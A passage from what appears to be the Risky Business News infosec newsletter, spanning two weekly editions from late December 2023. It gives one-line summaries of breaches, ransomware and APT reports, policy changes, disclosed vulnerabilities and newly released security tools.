DsmSvc analysis: Germany's BSI cybersecurity agency has published a security analysis of the Windows 10 Device Setup Manager Service (DsmSvc) driver management utility.
Tesla Elon mode: Three security researchers used a voltage drop glitch to jailbreak a Tesla car's autopilot and gain root access to the car and autopilot system. With this access, the group activated a previously unknown feature named Elon Mode, which gave them full control over the car.
Infosec industry
37C3 videos: Talks from the 37th Chaos Communication Congress (37C3) security conference, which took place at the end of December in Germany, are available on YouTube.
New tool—SecButler: Security firm GroundSec has released SecButler, a collection of tools for pen-testers and bug bounty hunters.
New tool—Domainim: Russian software developer pptx704 has released Domainim, a domain reconnaissance tool for organizational network scanning.
New tool—EDRSilencer: Security researcher Chris Au has released EDRSilencer, a tool that silences EDR solutions and prevents them from reporting security events to their servers.
New tool—Honeydet: Security researcher James Brine has open-sourced Honeydet, a tool to detect online honeypots.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.
You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The RiskyBiz crew behind our newsletters and podcasts is on hiatus between December 8 and January 8 for the winter holidays, but we put out this weekly edition with some of the past week's biggest infosec stories.
Happy holidays!
Breaches, hacks, and security incidents
Rosvodokanal hack: A Ukrainian hacker group named BlackJack has breached and destroyed the IT infrastructure of Rosvodokanal, a major Russian water-supply company. The group says it carried out the attack in response to Russia's cyberattack on Ukraine's Kyivstar mobile telco. BlackJack told reporters they had assistance from Ukraine's SSU intelligence service. The agency didn't confirm. [Additional coverage in RBC-Ukraine]
Bitrix24 attack: Ukraine's IT Army took credit for DDoS attacks that took down Bitrix24, Russia's largest CRM provider. [Additional coverage in The Record]
VF Corp incident: VF Corp, the company behind retail brands such as Vans, Dickies, and Timberland, says it suffered a cybersecurity incident. VF Corp declined to comment on whether the incident was a ransomware attack. [Additional coverage in RetailDive]
National Amusements incident: National Amusements, the company behind CBS and Paramount, disclosed a cybersecurity incident. The breach took place in December 2022 but was only recently discovered. More than 82,000 people had their data stolen in the incident. [Additional coverage in TechCrunch]
First American incident: First American, the second largest title insurance company in the US, shut down its IT systems in the aftermath of a cyberattack. The incident took place after the AlphV gang hit Fidelity National, the largest title insurer in the US, at the end of November.
Mint Mobile breach: Mint Mobile has disclosed a new data breach.
Bedroom footage sold online: Private camera footage from bedrooms, changing rooms, toilets, and massage parlors in Vietnam has been hacked and put on sale online. [Additional coverage in VNExpress]
All the apes are safe: Yuga Labs co-founder Greg Solano has paid a hacker a bounty of 120 ETH ($275,000) to return 36 Bored Ape Yacht Club (BAYC) and 18 Mutant Ape Yacht Club (MAYC) NFTs that were stolen during a hack of the NFT Trader platform in early December. NFTs worth nearly $3 million were stolen in the hack, but the apes are now safe! [Additional coverage in Cointelegraph]
GTA V code leaks online: Hackers have leaked the source code of GTA V. The code was stolen in September 2022 by Arion Kurtaj, a member of the Lapsus$ hacking crew. The code was released following Kurtaj's sentencing. [Additional coverage in RockstarIntel]
Ubisoft probes hack: A threat actor claims to have hacked and stolen more than 900GB of data from gaming studio Ubisoft. The company said it's investigating the claims and has not confirmed a breach. [Additional coverage in Xfire]
General tech and privacy
Chrome Safety Check: Google has announced that Safety Check, the feature that scans for compromised user passwords, will now continuously run in the background at all times.
"We're also extending Safety Check to revoke sites' permissions — like access to your location or microphone — if you haven't visited them in a long time. And Safety Check will now flag if you’re getting a lot of notifications from sites you don’t engage with that much, so you can easily disable them."
Wikipedia Russia shuts down: Wikipedia's Russian edition has shut down after authorities designated its lead editor as a "foreign agent."
Substack Against Nazis: More than 100 Substack editors named "Substack Against Nazis" have signed an open letter asking Substack to remove white supremacy and nazi newsletters hosted on the platform, threatening to leave if the company fails to act.
Government, politics, and policy
FTC COPPA update: The US FTC has put forward a series of updates meant to strengthen the Children's Online Privacy Protection Act (COPPA) and put new restrictions on the collection and use of children's data.
"The proposal aims to shift the burden from parents to providers to ensure that digital services are safe and secure for children. [...] The rule also limits the personal data that websites and other online services can collect from children, limits how long they can retain such data, and requires them to secure the data."
GAO report on medical device cybersecurity: The US Government Accountability Office has published a report on the cybersecurity of medical devices. The agency recommended that CISA and the FDA update their collaboration agreement, which is now five years old and outdated in the face of the current threat landscape.
EU CSA: EU officials have agreed on a form of the EU Cyber Solidarity Act, new regulation that will provide a quick way for EU member states to share information on large-scale cyberattacks.
Tallinn Mechanism: Ukraine's partners have activated the Tallinn Mechanism, a new system to provide cyber and military aid to the besieged country.
Israel-Hamas war: Israel's National Cyber Directorate says that 15 hacking groups associated with Iran, Hezbollah, or Hamas have launched attacks against Israel since the October 7 incident. [Additional coverage in Calcalist]
IDF censorship: The Israeli military has prohibited Israeli media from reporting on cyberattacks targeting the government and on cyber operations carried out by officials as part of its war on Hamas. [Additional coverage in The Intercept]
Risky Business Podcasts
In this podcast, Patrick Grey and Tom Uren talk about whether election interference will take place in the Taiwanese, US, and Russian elections that are all taking place in 2024. They also look at a ChatGPT-powered online harassment campaign.
Cybercrime and threat intel
Lapsus$ member handed indefinite hospital order: A UK judge has sentenced a member of the Lapsus$ hacking crew to an indefinite hospital order. Arion Kurtaj from Oxford, 18, was diagnosed with severe autism and was deemed unfit to stand trial. Kurtaj was directly involved in Lapsus$ breaches at Nvidia and BT/EE. He also hacked Rockstar Games and leaked images of the upcoming GTA6 game while on bail. [Additional coverage in the BBC]
FruitFly malware author case: On the same note, a US court found Phillip Durachinsky, the creator of the FruitFly macOS spyware, incompetent to stand trial because of his autism spectrum disorder. [Additional coverage in Cleveland.com]
FACCT exec to be extradited to Russia: Kazakh officials have agreed to extradite an exec of Russian cybersecurity firm FACCT—the former Russian branch of Group-IB—to Russia. Nikita Kislitsin was initially detained following an international arrest warrant issued in the US. Russia filed its own hoax indictment days later and requested his extradition as well. [Additional coverage in TASS/ English coverage in The Record]
Operation HAECHI IV: Interpol detained more than 3,500 suspects and seized nearly $300 million as part of a crackdown against cybercrime groups the agency calls Operation Haechi IV. Officials said the suspects were involved in cyber-enabled scams, such as voice phishing, romance scams, online sextortion, BEC, and investment fraud.
Digital skimming campaign disrupted:Europol and Group-IB have identified and notified the owners of 443 merchants that had digital skimmers installed on their online stores.
Kingdom Market takedown: German officials have seized Kingdom Market, a dark web marketplace selling drugs, hacking tools, and fake IDs. The portal launched in March 2021 and was accessible via both Tor and I2P. The site's admin, a Slovakian man, was also charged in the US.
Crypto-drainer attacks: A threat actor has used Google and Twitter ads to lure victims on specialized phishing sites (called crypto drainers) that collect crypto-wallet credentials and empty accounts. The group is believed to have stolen $58.98 million from over 63,210 victims over the past nine months.
Carding scene stats: More than 71.4 million card details were posted for sale on underground carding shops, and more than 48 million card details were posted online for free throughout 2023, according to Recorded Future's Payment Fraud Year in Review report.
PyPI malware: ReversingLabs has identified five malicious Python libraries uploaded on the official PyPI portal. This batch abused GitHub Gists, issuing commands through Git commit messages.
Malicious Chrome and Edge extensions:ReasonLabs have found three Chrome and Edge browser extensions disguised as VPN tools that hijacked users' browsers to install other extensions, steal user data, and more.
Lumma usage explodes: ESET has published its threat report for H2 2023, and among the report's main findings is the sudden rise in Lumma Stealer detections.
Carbanak returns: Old malware from the Carbanak banking heists gang has been spotted in attacks throughout November 2023, used in intrusions that ended in ransomware attacks, according to the NCC Group.
Intellexa and Cytrox: Cisco Talos has published a history of Intellexa and Cytrox, two major spyware vendors.
Talos' analysis revealed that rebooting an iOS or Android device may not always remove the Predator spyware produced by Intellexa. Persistence is an add-on feature provided by Intellexa for their implants and primarily depends on the licensing options chosen by a customer.
Intellexa knows if their customers intend to perform surveillance operations on foreign soil.
Two years after its first public exposure, Intellexa’s Predator/Nova spyware solution continues to be undetected by anti-virus solutions.
Atlassian exploitation: Internet scanning service GreyNoise warns of a rise in attacks targeting Atlassian systems.
Old Excel bug campaign: A threat actor is leveraging a 2017 Excel RCE to infect users with the Agent Tesla infostealer. More from Zscaler.
Nim campaign: Netskope looks at a phishing campaign spreading a Nim-based backdoor using emails claiming to come from the Nepali government.
BattleRoyal: Proofpoint has published a report detailing BattleRoyal, a threat actor behind a wave of phishing campaigns that are redirecting users to websites hosting fake browser update schemes that infect victims with the DarkGate and NetSupport malware.
Smishing Triad: Resecurity reports on new smishing campaigns carried out by the Smishing Triad group. See previous reports from August and September.
Malware technical reports
JaskaGO: AT&T's Alien Labs security team looks at JaskaGO, a new malware strain targeting macOS and Windows systems. As the name alludes, the malware is written in Go.
Bandook: Fortinet has analyzed the C&C mechanism of Bandook, a remote access trojan that's been used in attacks since way back in 2007.
Akira: Sophos researchers have published a report on the recent tactics and IOCs employed by the Akira ransomware group.
Chameleon: A new version of the Chameleon Android banking trojan now disables fingerprint and facial scanning features as a way to bypass biometric authentication and take over devices.
Xamalicious: McAfee has published a report on Xamalicious, a new Android backdoor coded using Xamarin, an open-source framework that allows building Android and iOS apps with .NET and C#.
Operation HamsaUpdate: Intezer looks at a phishing campaign that targeted Israeli companies with emails claiming to be from networking equipment vendor F5.
"The campaign leverages a convincingly written email in Hebrew and utilizes sophisticated social engineering techniques, pressuring victims to execute the harmful code residing on their servers. The final attack delivers a complex, multi-stage loader or a destructive wiper, each variant customized for either Linux or Windows environments. [...] We’ve dubbed the Windows variant Hatef and the Linux variant Hamsa. During our analysis, we unearthed a second-stage loader coded in Delphi—which spearheads the execution of an AutoIt injector. This injector has been given the name Handala."
Sponsor Section
In this product demo, GreyNoise founder and CEO Andrew Norris demonstrates how people use the GreyNoise sensor network.
APTs, cyber-espionage, and info-ops
Peach Sandstorm: Iranian hacking group Peach Sandstorm (APT33, Holmium) is targeting defense companies across the world in attacks aiming to deploy a new backdoor named FalseFont. The backdoor was first spotted at the end of November, and the group is known for its broad use of password-spraying attacks.
OilRig's Menorah: SecurityScorecard's Vlad Pasca has a technical breakdown of Menorah, a backdoor used by the OilRig (APT34) Iranian espionage group.
Kimsuky's AppleSeed: AhnLab researchers have published an analysis of AppleSeed, a macOS malware strain used by North Korean hacking group Kimsuky.
UAC-0050: Ukraine's CERT team is seeing new UAC-0050 spear-phishing targeting Ukrainian organizations.
UAC-0099: DeepInstinct researchers look at a UAC-0099 spear-phishing campaign targeting Ukrainian officials with CVE-2023-38831, a former zero-day in the WinRAR app.
Cloud Atlas: Russian security firm FACCT has published a report on attacks against Russian companies by Cloud Atlas, an APT group that has been active since 2014.
Vulnerabilities, security research, and bug bounty
New Barracuda zero-day: On Christmas Eve, Barracuda disclosed the existence of a zero-day in its ESG appliance (CVE-2023-7102). Barracuda says it deployed a security update to all active ESG appliances on December 21 that was applied automatically and then deployed a second patch the following day to ESG appliances that exhibited indicators of compromise for new variants of the SEASPY and SALTWATER malware. The company attributed the attacks to UNC4841, the same Chinese group that exploited its appliances last year.
Chrome zero-day: Google has pushed a security update for Chrome browsers to fix an actively exploited zero-day (CVE-2023-7024).
CLFS exploits: Kaspersky shares a list of five exploits in the Windows Common Log File System (CLFS) driver that have been used over the past year by ransomware gangs as part of their intrusions.
Buffalo VPN router bugs: NSLabs researchers have found three vulnerabilities in Buffalo VR-S1000 VPN routers.
Ivanti Avalanche vulnerabilities: Ivanti has released patches for 20 vulnerabilities in its Avalanche MDM product.
Roundcube 2FA bypass: Security researcher Chand Singh has published details on CVE-2023–43837, a 2FA bypass in Roundcube's webmail plugin.
2023 vulnerability threat landscape: More than 26,000 vulnerabilities were reported this year, but only less than 1% were routinely exploited in the wild, according to the Qualys 2023 Threat Landscape report.
Infosec industry
New tool—Troll-A: Security firm Crissy Field has released Troll-A, a tool to extract passwords, API keys, and tokens from WARC (Web ARChive) files.
New tool—AuthLogParser: Eilay Yosfan from Security Joes has published AuthLogParser, a powerful DFIR tool designed specifically for analyzing Linux authentication logs, commonly known as auth.log.
New tool—SysReptor: Something we missed from May
New tool—Shadow-Pulse: Security researcher StrangerealIntel has published a spreadsheet with basic details on every major ransomware operation.
New tool—SigmaToARM: Redcentric's Ollie Legg has released SigmaToARM, a tool to convert Sigma rules to Azure ARM templates.
New tool—Ghidriff: A security researcher from ClearSecLabs has open-sourced a tool named Ghidriff, a binary-diffing engine for Ghidra.
Tool update—Ghidra: The NSA has released v11 of its Ghidra reverse engineering toolkit. The biggest update is initial support for Rust binaries.
Acquisition news: Cisco has acquired multi-cloud security startup Isovalent, known for its open-source products Tetragon, eBPF, and Cilium.
WaPo retires Cybersecurity 202: The Washington Post has retired its Cybersecurity 202 newsletter as part of recent layoffs.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about recent hints that the Ukrainian government has figured out how to make use of the IT Army.
You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The RiskyBiz crew behind our newsletters and podcasts is on hiatus between December 8 and January 8 for the winter holidays, but we put out this weekly edition with some of the past week's biggest infosec stories.
Happy holidays!
Breaches, hacks, and security incidents
Cyberattack on Iranian gas stations: A hacktivist group known as Predatory Sparrow has crippled the payment systems of gas stations across Iran. The incident is believed to have impacted more than 2,000 of the country's gas pumps (~70% of all pumps). Iranian officials have confirmed the incident and claimed the group is a front for Israeli and US cyber operations. BBC Persia claims the incident had a sprawling impact across the country, even days after the attack.
Ledger incident: A threat actor has compromised the npm account of a former Ledger employee and added malicious code to a Ledger SDK meant to connect web apps to the Ledger backend. The malicious code emptied Ledger wallets on websites that used the compromised SDK. Losses are estimated to be around $600,000.
Comcast hack: US telco Comcast says that hackers exploited the CitrixBleed vulnerability to breach one of its systems and steal the personal information of almost 36 million customers. Comcast says the hack took place between October 16 and October 19, 2023
Mr. Cooper hack: Mortgage and lending company Mr. Cooper says the ransomware attack that hit its IT systems at the end of October led to the theft of personal data of almost 14.7 million customers.
Coin Cloud hack: Hackers claim to have stolen the personal data of more than 300,000 customers of now-defunct Bitcoin ATM provider Coin Cloud. The hackers claim the data also includes more than 70,000 pictures of customers taken using the ATMs' cameras. [Additional coverage in TechCrunch]
MongoDB hack: The company behind the MongoDB database has announced a security breach of its corporate systems. The breach took place on December 13, and attackers appear to have gotten their hands on some customer data. MongoDB says they have not seen any unauthorized access to customer cloud environments (so far).
Kyivstar attribution: A hacking group named Solntsepek took credit for the attack that crippled Kyivstar, Ukraine's largest mobile telco. Ukrainian officials have attributed the attack to a hacking unit linked to Russia's military intelligence service GRU. Solntsepek has been previously linked to Sandworm.
OKX crypto-heist: A threat actor has stolen $2.7 million worth of crypto assets from OKX after they gained access to one of the platform's smart contracts keys.
Aurory crypto-heist: The Aurory cryptocurrency exchange has been hacked for $1.2 million worth of assets. The attacker apparently drained 80% of the company's liquidity pools. The platform has shut down all operations to investigate the hack.
NFT Trader crypto-heist: A threat actor exploited a vulnerability in the NFT Trader platform and stole $3 million worth of NFTs. NFT Trader blamed the bug on one of its third-party tools—like that would make their users feel better for some reason. The culprit seems to be the Flooring Protocol.
General tech and privacy
Windows Protected Print Mode: Microsoft has announced Windows Protected Print Mode (WPP), a more secure rewrite of the Windows print mode, the feature that allows the operating system to interact with printing devices. The new WPP mode was designed around the Internet Printing Protocol (IPP) and removes the need for third-party printing drivers, which are set to be phased out in the coming years. Microsoft says the new mode will be available for testing via Insiders builds and should work fine with most printers made in the last 10 years.
SAC in Windows 11: Germany's BSI has published a technical analysis of the new Smart App Control feature in Windows 11. It's in German, though.
Google Maps geolocation data update: Google has changed how its Maps app stores geolocation data. Going forward, Maps will store all user location data on the device instead of Google's servers. The company made the change after law enforcement agencies had been abusing geo-fencing warrants to mass-collect data on everyone who entered a specific geographical area, whether they were suspects or not.
Apple to require warrants for push notification data: Apple has updated its legal guideline [PDF] and will now require law enforcement agencies to obtain warrants for its users' push notification data. The new rules were put in place after a US senator exposed that law enforcement agencies from different countries were requesting push notification metadata from both Apple and Google as part of their investigations. [Additional coverage in The Verge]
Apple Stolen Device Protection: Apple is rolling out a new iOS feature named Stolen Device Protection that, when enabled, will require users to authenticate using Face ID or Touch ID before making changes to sensitive device settings. Besides requiring a facial scan or fingerprint scan, the Stolen Device Protection feature also adds a one-hour delay before changes are applied, allowing real device owners to still have access to their accounts and devices and prevent being locked out. [Additional coverage in MacRumors]
Passcode 5th Amendment: The Utah Supreme Court has ruled that suspects can refuse to hand over their phone passcode to police during an investigation. The court unanimously ruled that passcodes fall under the protection of the US Constitution's Fifth Amendment, which protects citizens from self-incrimination. [Additional coverage in ArsTechnica]
NGO sues Adobe: A Dutch NGO has sued Adobe for using browser cookies to track the web activity of Dutch citizens.
Active Listening: Marketing materials from the Cox Media Group claim the company can tap into customer device microphones (smartphones, TVs, etc.) and listen to nearby conversations. Named Active Listening, the feature is touted as a way to improve ad delivery. [Additional coverage in 404 Media]
Firefox 121: Mozilla has released Firefox 121. New features and security fixes are included. The biggest changes in this release are Wayland-by-default on Linux and an option in the settings page to force Firefox to underline all links.
Weibo tells users to be careful: Chinese social media company Weibo has told users to avoid expressing pessimism about the economy.
Spam bots come to Mastodon:SeveralMastodoninstances have been dealing with a giant wave of spam accounts over the past week.
Dropbox AI drama: Dropbox has a new "AI" feature that will take your files and share them with OpenAI. Obviously, most users didn't know about it. [Additional coverage in ArsTechnica]
Threads TOS drama: Mastodon server admins and their users are in shock to find out that Meta has given itself the right to scrape everyone's data and track their activity once Threads federates with Mastodon instances and anyone interacts with a single piece of Threads content. I kid you not!
Government, politics, and policy
EU starts Twitter investigation: EU officials have opened an official investigation into Twitter for "the dissemination and amplification of illegal content and disinformation in the EU, transparency of the platforms and design of the user interface." The investigation comes days after an Irish newspaper reported that Musk intentionally crippled the platform's ability to remove disinformation, CSAM, and other illegal content.
NCSC CEO leaving: The CEO of the UK NCSC cyber agency is leaving her post for a diplomatic post. [Additional coverage in The Record]
Pegasus in Poland: A Polish court has confirmed that Polish state TV service TVP used manipulated SMS messages that were stolen from an opposition leader using the Pegasus spyware. The report confirms—yet again—that the former Polish government used the Pegasus spyware in politically motivated operations rather than legitimate law enforcement operations. [Additional coverage in OKO Press]
China's incident classification tiers: The Chinese government is working on a four-tier system that will be used to classify cybersecurity breaches and related incidents. The four tiers are color-coded and go from blue to yellow to orange and then red based on an incident's severity and impact on citizens and national security.
China warns of foreign backdoors: The Chinese Ministry of State Security says an "extensive investigation" found backdoors in overseas geolocation software that was being used to collect data from Chinese firms. [Additional coverage in Reuters/non-paywall]
China's iPhone ban expands: More and more Chinese government agencies and state-controlled companies are imposing bans on using iPhones at work. The new ban has been described as a "major step up" from the initial ban in September, which only impacted the highest levels of the Chinese government. [Additional coverage in AppleInsider]
FISA S702 temporary renewal: US lawmakers have temporarily extended the FISA Section 702 surveillance powers until April 19, 2024, to give themselves more time to negotiate. Section 702 is expiring at the end of the year. [Additional coverage in The Record]
CISA SbD alert: CISA issued its third Secure by Design security advisory. This one urges software makers to stop using static default passwords for their products.
FCC adopts new data breach rules: The US Federal Communications Commission has adopted new data breach notification rules for US telcos. The new rules remove the need to notify users of a data breach if no harm is likely to occur, expand the scope of a breach to cover accidental data exposures to telco employees and their providers, add mandatory breach reporting to the FCC itself, and remove breach notification waiting periods—meaning telcos have to notify users as soon as possible.
Foreign election interference: The US ODNI has published a report detailing the foreign interference that took place during the 2022 US Midterm Elections. The report notes that while China interfered, it did so for both parties. On the other hand, Russia focused many efforts on trying to denigrate the Democratic Party and its support for Ukraine.
US Senate confirms Haugh: The US Senate has confirmed Air Force Lt. Gen. Timothy Haugh as the next head of the NSA and US Cyber Command.
NSA cybersecurity year in review: The NSA has published its cybersecurity year-in-review report.
Risky Business Podcasts
In this podcast, Patrick Grey and Tom Uren talk about whether election interference will take place in the Taiwanese, US, and Russian elections that are all taking place in 2024. They also look at a ChatGPT-powered online harassment campaign.
Cybercrime and threat intel
FBI disrupts AlphV ransomware: US authorities have hacked and seized server infrastructure operated by the AlphV (BlackCat) ransomware gang. Authorities say they also recovered 500 encryption keys, which they are now offering together with a decrypter to all affected victims. This confirms rumors from last week.
Pig-butchering gang detained: US authorities have unsealed charges against four suspects (detained two) for their role in a sprawling crypto-investment scheme (aka pig butchering) that netted them $80 million.
Nirvana Finance hacker pleads guilty: Shakeeb Ahmed, 34, of New York, pleaded guilty to hacking the smart contract of Nirvana Finance and stealing $12.3 million from the company and its users. US authorities said Ahmed was the first person arrested in the US for hacking a smart contract. Ahmed used to work for Amazon.
Storm-1152 disrupted: Microsoft took legal action to disrupt the server infrastructure of Storm-1152, a threat actor who created and sold access to more than 750 million Microsoft accounts. The accounts were used to help other bad actors avoid identity checks and carry out online fraud. In addition, the group ran a service to help crooks bypass online CAPTCHA tools. As part of the legal case, Microsoft named three Vietnamese men as Storm-1152 members. They were identified in court records as Duong Dinh Tu, Linh Van Nguyễn, and Tai Van Nguyen.
Mobile banking malware: Zimperium has published its yearly report on the mobile banking malware landscape. The company says it spotted 29 mobile banking malware strains this year, targeting more than 1,800 banking applications across 61 countries. The top banking malware was Hook, which targeted 618 e-banking apps. The most targeted country was the US, with 109 banks targeted.
Magento wish list exploit: Sansec researchers have documented a series of attacks against the wish list function of Magento 2 e-commerce sites.
Target hacker hunt: Infosec reporter Brian Krebs has managed to untie and unwind new knots in his hunt for the Target hacker, an individual known as Rescator.
Ransomware figures: According to court data, French authorities have started 512 ransomware-related investigations in 2023, representing a new report for the European country. On that note, both SentinelOne and Guidepoint have also published reports on recent developments from the ransomware ecosystem, covering numbers and recent tactics. [Additional coverage in ZDNet France]
Ransomware and the press: Sophos researchers look at how ransomware gangs have been using and interacting with journalists as part of their day-to-day operations and extortion campaigns.
Wazawaka profile: Prodaft researchers have published a profile on Wazawaka, an infamous ransomware affiliate identified by US authorities as Russian national Mikhail Matveev. The report looks at Matveev but also his team, including other threat actors such as 777, bobr.kurwa, krbtgt, shokoladniy_zayac, WhyNot, and dushnila.
Malvertising campaign: Malwarebytes has been tracking malvertising campaigns leveraging Google search ads for stuff like WinSCP and Zoom to deliver payloads like PikaBot and the HiroshimaNukes or FakeBat loaders.
UNC2975: On the same topic, Google's Mandiant division looks at UNC2975, which the company describes as one of the largest clusters of malvertising activity today.
DarkSide member moves to malvertising: ConnectWise researchers have spotted a former member of the DarkSide ransomware gang delivering trojanized apps using malicious ads on search result pages.
"Automation employed by attackers can leave traces of information about their campaigns in various data sources. Security defenders can find these traces in locations such as certificate transparency logs (e.g., certificate field reputation or timing information) and passive DNS (pDNS) data (e.g., infrastructure reuse or characteristics)."
OLVX: ZeroFox has published a report on OLVX, a new underground cybercrime shop selling access to hacked servers via shells, RDP, SSH, SMTP, webmail, cPanel, and others. The site also sells compromised accounts, combolists, and phishing kits.
8220 Gang: Imperva looks at the 8220 Gang—a cryptocurrency operation—targeting Oracle WebLogic servers with a new vulnerability tracked as CVE-2020-14883.
GambleForce: A new threat actor named GambleForce has been using SQL injection attacks to breach government and gambling sites in the APAC region.
Malware technical reports
NKAbuse: Kaspersky has identified a new botnet targeting Linux systems. Named NKAbuse, the botnet gets its name after its use of the NKN protocol for its C2 channel.
InfectedSlurs botnet: Akamai is seeing the InfectedSlurs botnet expand its attack arsenal and go after QNAP VioStor NVR devices using CVE-2023-47565.
Vetta Loader: Italian security firm YOROI has published a technical report on Vetta Loader, a new malware strain hitting Italy and spreading through infected USB devices.
BazarCall: Abnormal Security has seen a new wave of BazarCall phishing campaigns. The malware was in fashion in 2020-2021 but has somewhat lost steam in recent years.
Rhadamanthys: Check Point has published a technical deep-dive into the Rhadamanthys infostealer. Its latest version comes with additional spying features and a plugin system.
New banking trojan: IBM X-Force has looked at a new banking trojan—possibly related to DanaBot—employing a new web injection module that targets more than 40 banks across North America, South America, Europe, and Japan.
DanaBot: And since we're on DanaBot, OALABS has published some recent IOCs on the malware.
BatLoader and FakeBat: eSentire looks at two Russian Malware-as-a-Service platforms (BatLoader and FakeBat) and their recent operations abusing Google search ads.
BianLian: Security researcher Cryptax has published an analysis of the BianLian Android banking trojan (not to be confused with the ransomware operation).
Play and AlphV: CISA has published technical advisories on the Play and AlphV ransomware strains. According to CISA, AlphV asked for $500 million in ransoms and received nearly $300 million.
Kuiper ransomware: Stairwell looks at Kuiper, a new Ransomware-as-a-Service operation that has been advertised on underground forums since September.
Sponsor Section
In this product demo, GreyNoise founder and CEO Andrew Norris demonstrates how people use the GreyNoise sensor network.
APTs, cyber-espionage, and info-ops
OilRig: ESET looks at four new OilRig downloaders, named SampleCheck5000, OilCheck, ODAgent, and OilBooster.
MuddyWater: Broadcom's Symantec looks at a MuddyWater (Seedworm) campaign targeting telcos in Egypt, Sudan, and Tanzania.
Gaza Cybergang: SentinelOne looks at Pierogi++, a new backdoor used by the Gaza Cybergang in 2022 and 2023 operations targeting Hamas opposition.
Sidewinder: CyFirma researchers look at SideWinder's macro malware arsenal. SideWidner, also known as Rattlesnake, is a suspected Pakistani APT group.
Kasablanka: Qihoo 360 looks at Kasablanka APT attacks targeting the Nagorno-Karabakh region with VenomRAT payloads.
DPRK recruitment ops: NISOS researchers look at online personas used by DPRK operators to fraudulently obtain remote employment from unwitting companies in the United States.
UAC-0177 (JokerDPR): Ukraine's CERT team has published IOCs for UAC-0177 (JokerDPR), the hacking group that claimed last year to have hacked Ukraine's Delta military communications platform. The group has also amplified Russian disinformation efforts about the war in Ukraine.
Calisto APT: Sekoia has published its own (previously private) report on how they identified Russian individual Andrey Korinets as a member of the Calisto (Star Blizzard, Cold River) APT—recently sanctioned by the UK and charged by the US.
APT29 alert: CISA, the NCSC, and Poland's CERT team and SKW service warn that APT29 (linked to Russia's SVR intelligence agency) is exploiting a vulnerability (CVE-2023-42793) in JetBrains TeamCity servers for initial access to corporate and government systems. Fortinet and Logpoint also looked at the same attacks. According to the Shadowserver Foundation, more than 800 unpatched TeamCity servers were still connected online last week.
Volt Typhoon: Lumen has linked the new KV-botnet to the Volt Typhoon Chinese cyber-espionage group. Comprised of unpatched Cisco, Netgear, and Fortinet devices, the botnet has been used as a proxy and covert data transfer network.
"We assess from both our telemetry and open-source reporting, that the use of this botnet is limited to Chinese state-sponsored organizations. Thus far the victimology Black Lotus Labs has observed from the KV-cluster aligns primarily with a strategic interest in the Indo-Pacific region, having a particular focus on ISPs and government organizations. At least one user of the KV-cluster is Volt Typhoon, but Volt Typhoon is believed to operate over other obfuscation networks as well. We believe that it would be unlikely for the threat actor to repurpose this network to target lower valued networks and risk its discovery."
Chinese info-op targeting US: ASPI researchers have found a network of YouTube accounts pushing pro-Chinese and anti-US narratives and misinformation. Many of the videos used generative AI. The world of at-scale AI-generated misinformation is upon us.
Chinese info-op in Taiwan: In a different report, Graphika researchers say they found thousands of inauthentic accounts across Facebook, YouTube, and TikTok attacking pro-independence parties and pushing pro-Chinese propaganda in Taiwan ahead of the country's election in January 2024.
Another Chinese info-op: On the same front, ISD has seen new Spamouflage activity pushing pro-Chinese and anti-US narratives and misinformation.
Google info-op report: Google has published its quarterly report on influence operations on its websites. Lots of Chinese and Russian operations are mentioned.
TikTok info-ops: TikTok has published its Q3 threat report that looked at the influence operations the company spotted on its site. Six of the 16 campaigns were related to Russia's invasion of Ukraine.
ANSSI alert on telco attacks: France's cybersecurity agency has published a security advisory warning of increasing APT attacks targeting the telecommunications sector.
Vulnerabilities, security research, and bug bounty
Zoom unveils VISS: Video conferencing software maker Zoom has unveiled VISS, a new vulnerability impact scoring system.
"By objectively measuring the impact of vulnerabilities from a defender's perspective, VISS can base its evaluations on responsibly demonstrated exploitation rather than theoretical threats."
Terrapin attack: A team of academics has published details on Terrapin, a new attack against the SSH protocol. The attack requires an AitM position but can be used to downgrade SSH connections to less secure states. SSH clients, such as SUSE and PuTTY, have been notified and are rolling out patches. The attack is tracked as CVE-2023-48795.
Marvin attack impacts Rust: The Marvin cryptographic attack was found to also impact Rust's RSA implementation.
Opera address bar spoofing: Opera's mobile browsers are vulnerable to a bunch of address bar spoofing attacks.
AWS WAF bypass: BCK Security researchers found and helped patch a bypass of the AWS WAF.
Unpatched GWT vulnerability: BishopFox researchers look at an eight-year-old and still unpatched vulnerability in the Google Web Toolkit framework.
Unpatched Google OAuth vulnerability: TruffleSecurity published details about a Google OAuth vulnerability that lets former employees retain access to corporate apps even after they've been off-boarded and removed from their employer's Google organization. Google has not patched the reported issue.
Perforce vulnerabilities: Microsoft has identified four vulnerabilities in Perforce Helix Core Server, a source code management platform widely used in the video game industry. The vulnerabilities include one unauthenticated RCE (CVE-2023-45849) with a 10.0 severity rating.
KingConnect vulnerabilities: White Oak Security has found four vulnerabilities in KingConnect routers, including an unauth RCE. KingConnect did not respond to the responsible disclosure process, so the bugs are unpatched.
Nagios vulnerabilities: NCC Group researchers have discovered 16 vulnerabilities in the Nagios XI remote monitoring toolkit.
Outlook RCE: Akamai has published a two-part writeup on two Outlook vulnerabilities (CVE-2023-35384 and CVE-2023-36710) that can be chained for RCE attacks on Outlook instances.
SMTP Smuggling: SEC Consult has published details on SMTP Smuggling, a new technique for spoofing emails while not breaking SPF checks. Email servers from Cisco, GMX, and Microsoft were found to be affected, all of which have released fixes or mitigations.
Mobile telephony vulnerability: Dvuln researchers have described a method through which attackers could abuse tel:// links in SMS messages to trick users into setting up unauthorised call forwarding on their devices.
Log4Shell exposure shrinks:Research by VulnCheck has found that two years after its disclosure, very few systems are still exposed to attacks via the Log4Shell vulnerability.
"The current footprint of internet-facing software that is potentially vulnerable to code execution via Log4Shell is approximately 125,000 hosts. Of the 125,000 hosts, approximately 95% are using known patched versions. Although many predicted a long tail of exploitation, two years after disclosure, there are very few remaining Log4Shell initial access targets."
Infosec industry
Acquisition news: Identity provider Okta is acquiring Israeli cybersecurity startup Spera for at least $100 million.
MITRE EMB3D: The MITRE Corporation has launched EMB3D, a threat model specifically designed for embedded devices.
New tool—YARA-Forge: Florian Roth has launched a new project named YARA-Forge, a tool designed to streamline the process of sourcing, standardizing, and optimizing YARA rules.
